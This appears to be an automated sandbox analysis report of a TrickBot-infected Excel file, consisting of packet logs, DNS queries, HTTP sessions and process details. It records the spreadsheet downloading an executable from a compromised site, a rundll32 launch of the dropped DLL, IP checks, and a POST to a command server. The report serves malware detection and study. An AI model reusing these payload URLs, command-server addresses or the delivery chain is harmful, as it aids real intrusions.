                                                                                                                                                                  Feb 20, 2021 02:03:50.669944048 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.669965029 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.669966936 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.669980049 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.670006990 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.670022011 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.670046091 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.670056105 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.670077085 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.670098066 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.670103073 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.670118093 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.670128107 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.670139074 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.670171022 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.670178890 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.670217991 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.675033092 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.729948044 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.729988098 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730015993 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730036974 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730048895 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730056047 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730058908 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730086088 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730088949 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730114937 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730123997 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730151892 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730195045 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730221033 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730232000 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730245113 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730273008 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730274916 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730278969 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730312109 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730382919 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730406046 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730429888 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730432034 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730441093 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730458021 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730470896 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730494976 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730607986 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730645895 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730668068 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730705976 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730910063 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730937958 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730952024 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730962992 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730978966 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.730988979 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.730997086 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.731021881 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.731597900 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.789562941 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.789591074 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.789608002 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.789625883 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.789712906 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790321112 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790347099 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790374041 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790395975 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790427923 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790455103 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790460110 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790466070 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790494919 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790502071 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790520906 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790539980 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790544987 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790564060 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790585041 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790586948 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790611982 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790632963 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790641069 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790653944 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790673971 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790728092 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790755033 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790774107 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790790081 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790796995 CET4916580192.168.2.22185.81.0.78
                                                                                                                                                                  Feb 20, 2021 02:03:50.790813923 CET8049165185.81.0.78192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:03:50.790833950 CET4916580192.168.2.22185.81.0.78

                                                                                                                                                                  UDP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Feb 20, 2021 02:03:50.464174986 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                  Feb 20, 2021 02:03:50.521975994 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:05:29.852530956 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                  Feb 20, 2021 02:05:29.914756060 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:05:29.931988001 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                  Feb 20, 2021 02:05:29.983189106 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:05:32.010483980 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                  Feb 20, 2021 02:05:32.072875977 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:05:32.076400995 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                  Feb 20, 2021 02:05:32.137552977 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:05:35.650758028 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                  Feb 20, 2021 02:05:35.714725971 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:05:35.717183113 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                  Feb 20, 2021 02:05:35.778270006 CET53560098.8.8.8192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:05:35.780849934 CET6186553192.168.2.228.8.8.8
                                                                                                                                                                  Feb 20, 2021 02:05:35.941054106 CET53618658.8.8.8192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:05:35.943697929 CET5517153192.168.2.228.8.8.8
                                                                                                                                                                  Feb 20, 2021 02:05:36.009109020 CET53551718.8.8.8192.168.2.22
                                                                                                                                                                  Feb 20, 2021 02:05:36.012715101 CET5249653192.168.2.228.8.8.8
                                                                                                                                                                  Feb 20, 2021 02:05:36.064273119 CET53524968.8.8.8192.168.2.22

                                                                                                                                                                  DNS Queries

                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                  Feb 20, 2021 02:03:50.464174986 CET192.168.2.228.8.8.80x6029Standard query (0)www.chipmania.itA (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:32.010483980 CET192.168.2.228.8.8.80x70c0Standard query (0)wtfismyip.comA (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:32.076400995 CET192.168.2.228.8.8.80x4ea4Standard query (0)wtfismyip.comA (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:35.650758028 CET192.168.2.228.8.8.80xc414Standard query (0)38.52.17.84.zen.spamhaus.orgA (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:35.717183113 CET192.168.2.228.8.8.80xd87aStandard query (0)38.52.17.84.cbl.abuseat.orgA (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:35.780849934 CET192.168.2.228.8.8.80x6ac9Standard query (0)38.52.17.84.b.barracudacentral.orgA (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:35.943697929 CET192.168.2.228.8.8.80xd43aStandard query (0)38.52.17.84.dnsbl-1.uceprotect.netA (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:36.012715101 CET192.168.2.228.8.8.80x7164Standard query (0)38.52.17.84.spam.dnsbl.sorbs.netA (IP address)IN (0x0001)

                                                                                                                                                                  DNS Answers

                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                  Feb 20, 2021 02:03:50.521975994 CET8.8.8.8192.168.2.220x6029No error (0)www.chipmania.itchipmania.itCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:03:50.521975994 CET8.8.8.8192.168.2.220x6029No error (0)chipmania.it185.81.0.78A (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:32.072875977 CET8.8.8.8192.168.2.220x70c0No error (0)wtfismyip.com95.217.228.176A (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:32.137552977 CET8.8.8.8192.168.2.220x4ea4No error (0)wtfismyip.com95.217.228.176A (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:35.714725971 CET8.8.8.8192.168.2.220xc414Name error (3)38.52.17.84.zen.spamhaus.orgnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:35.778270006 CET8.8.8.8192.168.2.220xd87aName error (3)38.52.17.84.cbl.abuseat.orgnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:35.941054106 CET8.8.8.8192.168.2.220x6ac9Name error (3)38.52.17.84.b.barracudacentral.orgnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:36.009109020 CET8.8.8.8192.168.2.220xd43aName error (3)38.52.17.84.dnsbl-1.uceprotect.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                  Feb 20, 2021 02:05:36.064273119 CET8.8.8.8192.168.2.220x7164Name error (3)38.52.17.84.spam.dnsbl.sorbs.netnonenoneA (IP address)IN (0x0001)

                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                  • www.chipmania.it
                                                                                                                                                                  • wtfismyip.com
                                                                                                                                                                  • 116.68.162.92:443

                                                                                                                                                                  HTTP Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  0192.168.2.2249165185.81.0.7880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  Feb 20, 2021 02:03:50.604053020 CET2OUTGET /mails/open.php HTTP/1.1
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                  Host: www.chipmania.it
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Feb 20, 2021 02:03:50.669842005 CET3INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Sat, 20 Feb 2021 01:03:50 GMT
                                                                                                                                                                  Server: Apache
                                                                                                                                                                  Content-Disposition: attachment; filename="10.jjkes"
                                                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                                                  Connection: Upgrade, Keep-Alive
                                                                                                                                                                  Keep-Alive: timeout=1, max=100
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 2a 96 79 f9 4b f8 2a f9 4b f8 2a f9 4b f8 2a a2 23 fb 2b f3 4b f8 2a a2 23 fd 2b 7e 4b f8 2a a2 23 fc 2b eb 4b f8 2a 01 3b fc 2b f6 4b f8 2a 01 3b fb 2b e8 4b f8 2a a2 23 f9 2b fc 4b f8 2a f9 4b f9 2a 9a 4b f8 2a 01 3b fd 2b d8 4b f8 2a 4e 3a f1 2b f4 4b f8 2a 4e 3a f8 2b f8 4b f8 2a 4e 3a 07 2a f8 4b f8 2a 4e 3a fa 2b f8 4b f8 2a 52 69 63 68 f9 4b f8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a4 73 2f 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1b 00 72 42 00 00 a4 03 00 00 00 00 00 c2 7d 41 00 00 10 00 00 00 90 42 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 8f 44 00 60 01 00 00 80 90 44 00 3c 00 00 00 00 c0 44 00 58 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 46 00 b0 11 00 00 60 81 44 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 81 44 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 42 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 71 42 00 00 10 00 00 00 72 42 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 18 08 02 00 00 90 42 00 00 0a 02 00 00 76 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 15 00 00 00 a0 44 00 00 0a 00 00 00 80 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 70 01 00 00 c0 44 00 00 72 01 00 00 8a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b0 11 00 00 00 40 46 00 00 12 00 00 00 fc 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 1a e6 68 07 ba 91 2f 00 00 33 c9 e8 ff 3c 08 00 6a 00 ff d0 33 c0 c3 cc cc cc cc cc cc cc cc
                                                                                                                                                                  Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$*yK*K*K*#+K*#+~K*#+K*;+K*;+K*#+K*K*K*;+K*N:+K*N:+K*N:*K*N:+K*RichK*PELs/`!rB}AB`F@ D`D<DXp@F`DpD@BX.textqBrB `.rdataBvB@@.data8DD@.rsrcXpDrD@@.reloc@FE@Bhh/3<j3


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  1192.168.2.224917295.217.228.17680C:\Windows\System32\wermgr.exe
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  Feb 20, 2021 02:05:32.203285933 CET4953OUTGET /text HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  User-Agent: curl/7.71.0
                                                                                                                                                                  Host: wtfismyip.com
                                                                                                                                                                  Feb 20, 2021 02:05:32.267560005 CET4953INHTTP/1.1 200 OK
                                                                                                                                                                  Access-Control-Allow-Methods: GET
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                                  Date: Sat, 20 Feb 2021 01:05:32 GMT
                                                                                                                                                                  Content-Length: 12
                                                                                                                                                                  Data Raw: 38 34 2e 31 37 2e 35 32 2e 33 38 0a
                                                                                                                                                                  Data Ascii: 84.17.52.38
                                                                                                                                                                  Feb 20, 2021 02:05:32.545891047 CET4954INHTTP/1.1 200 OK
                                                                                                                                                                  Access-Control-Allow-Methods: GET
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                                  Date: Sat, 20 Feb 2021 01:05:32 GMT
                                                                                                                                                                  Content-Length: 12
                                                                                                                                                                  Data Raw: 38 34 2e 31 37 2e 35 32 2e 33 38 0a
                                                                                                                                                                  Data Ascii: 84.17.52.38


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                  2192.168.2.2249176116.68.162.92443C:\Windows\System32\svchost.exe
                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                  Feb 20, 2021 02:05:55.532516956 CET6133OUTPOST /rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/ HTTP/1.1
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=---------FNVPIRVIEKQTDGGI
                                                                                                                                                                  Connection: Close
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                  Host: 116.68.162.92:443
                                                                                                                                                                  Content-Length: 282
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Feb 20, 2021 02:05:58.101294994 CET6137INHTTP/1.1 200 OK
                                                                                                                                                                  connection: close
                                                                                                                                                                  server: Cowboy
                                                                                                                                                                  date: Sat, 20 Feb 2021 01:05:56 GMT
                                                                                                                                                                  content-length: 3
                                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                                  Data Raw: 2f 31 2f
                                                                                                                                                                  Data Ascii: /1/


                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                  Feb 20, 2021 02:05:29.234872103 CET193.8.194.96443192.168.2.2249170CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBCN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBSun Feb 07 20:26:06 CET 2021Mon Feb 07 20:26:06 CET 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                                                                                                                                                  Feb 20, 2021 02:05:40.075192928 CET193.8.194.96443192.168.2.2249173CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBCN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBSun Feb 07 20:26:06 CET 2021Mon Feb 07 20:26:06 CET 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                                                                                                                                                  Feb 20, 2021 02:05:50.281522989 CET193.8.194.96443192.168.2.2249175CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBCN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBSun Feb 07 20:26:06 CET 2021Mon Feb 07 20:26:06 CET 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                                                                                                                                                  Feb 20, 2021 02:05:53.685561895 CET193.8.194.96443192.168.2.2249177CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBCN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBSun Feb 07 20:26:06 CET 2021Mon Feb 07 20:26:06 CET 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                                                                                                                                                  Feb 20, 2021 02:05:56.148684025 CET193.8.194.96443192.168.2.2249178CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBCN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBSun Feb 07 20:26:06 CET 2021Mon Feb 07 20:26:06 CET 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                                                                                                                                                  Feb 20, 2021 02:05:59.279273987 CET193.8.194.96443192.168.2.2249179CN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBCN=example.com, OU=IT Department, O=Global Security, L=London, ST=London, C=GBSun Feb 07 20:26:06 CET 2021Mon Feb 07 20:26:06 CET 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f

                                                                                                                                                                  Code Manipulations

                                                                                                                                                                  Statistics

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Start time:02:03:35
                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                  Imagebase:0x13f330000
                                                                                                                                                                  File size:27641504 bytes
                                                                                                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Start time:02:03:41
                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                                                  Imagebase:0xff2f0000
                                                                                                                                                                  File size:45568 bytes
                                                                                                                                                                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Start time:02:03:41
                                                                                                                                                                  Start date:20/02/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                                                  Imagebase:0x960000
                                                                                                                                                                  File size:44544 bytes
                                                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2094061002.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2089754481.00000000006C4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2089764139.00000000006C4000.00000004.00000001.sdmp, Author: Joe Security
